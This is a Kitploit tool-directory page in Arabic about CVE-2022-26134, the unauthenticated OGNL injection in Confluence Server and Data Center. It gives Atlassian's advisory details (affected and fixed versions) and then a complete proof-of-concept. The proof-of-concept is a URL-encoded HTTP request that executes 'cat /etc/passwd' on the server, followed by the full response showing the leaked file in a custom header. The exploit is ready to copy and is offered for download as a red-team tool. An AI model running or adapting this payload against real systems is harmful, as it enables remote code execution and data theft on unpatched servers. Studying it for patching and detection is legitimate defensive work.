Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-26134 — [CVE-2022-26134] حقن لغة التنقل في الرسم البياني للكائنات (OGNL) قبل المصادقة في Confluence | Kitploit
أدوات/GitHubGitHub/murataydemir/cve-2022-26134
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubmurataydemir/cve-2022-26134

CVE-2022-26134

[CVE-2022-26134] حقن لغة التنقل في الرسم البياني للكائنات (OGNL) قبل المصادقة في Confluence

عرض المستودع
138منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

[CVE-2022-26134] حقن لغة التنقل في الرسم البياني للكائنات (OGNL) قبل المصادقة في Confluence


Confluence هو منتج تعاوني قائم على الويب لمساحات العمل، تم تطويره بواسطة Atlassian. يمكن نشره محليًا (on-prem) أو كجزء من Atlassian Cloud. يتكوّن من 3 ميزات رئيسية: الصفحة، والمساحة، وشجرة الصفحات.

  • الصفحة: يعيش محتواك في الصفحات – وهي مستندات حيّة تنشئها على موقع Confluence. يمكنك إنشاء صفحات لأي شيء تقريبًا، بدءًا من خطط المشاريع وحتى ملاحظات الاجتماعات وأدلة استكشاف الأخطاء وإصلاحها والسياسات والمزيد.
  • المساحة: تُخزَّن الصفحات في مساحات – وهي مساحات عمل يمكنك من خلالها التعاون على العمل وإبقاء جميع محتواك منظمًا.
  • شجرة الصفحات: نظّم محتوى المساحة باستخدام شجرة صفحات هرمية تجعل العثور على العمل سريعًا وسهلاً. يمكنك تداخل الصفحات تحت المساحات والصفحات ذات الصلة لتنظيم الصفحات بأي طريقة تقريبًا.

في 2022-06-02 الساعة 20:00 UTC، أصدرت Atlassian نشرة أمنية تتعلق بثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) تؤثر على منتجات Confluence Server وConfluence Data Center. يمكنك العثور على معلومات مفصلة حول ثغرة CVE-2022-26134 في الأسفل.

الملخص: CVE-2022-26134 - ثغرة تنفيذ تعليمات برمجية عن بُعد بدون مصادقة بخطورة حرجة في Confluence Server وData Center
تاريخ إصدار النشرة: 02 يونيو 2022
المنتجات المتأثرة: Confluence Server وConfluence Data Center
الإصدارات المتأثرة: جميع الإصدارات المدعومة من Confluence Server وData Center متأثرة. الإصدارات الأحدث من 1.3.0 من Confluence Server وData Center متأثرة.
الإصدارات المُصححة: 7.4.17، 7.13.7، 7.14.3، 7.15.2، 7.16.4، 7.17.4 و7.18.1
معرّف (معرّفات) CVE: CVE-2022-26134 حقن لغة التنقل في الرسم البياني للكائنات (OGNL) قبل المصادقة في Confluence

إثبات المفهوم: طلب نموذجي 1

GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20/etc/passwd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Murat%22%2C%23a%29%29%7D/ HTTP/1.1
Host: vulnerablehost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close

الاستجابة 1

HTTP/1.1 302 
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1654688652451
Set-Cookie: JSESSIONID=47E8CE261CF7355A5625FEF65B4BD7DC; Path=/; HttpOnly
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-Cmd-Murat: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin confluence:x:2002:2002::/var/atlassian/application-data/confluence:/bin/bash 
Location: /login.action?os_destination=%2F%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat+%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Murat%22%2C%23a%29%29%7D%2Findex.action&permissionViolation=true
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Wed, 08 Jun 2022 11:44:12 GMT
Connection: close

PoC-1

تنزيل الأداة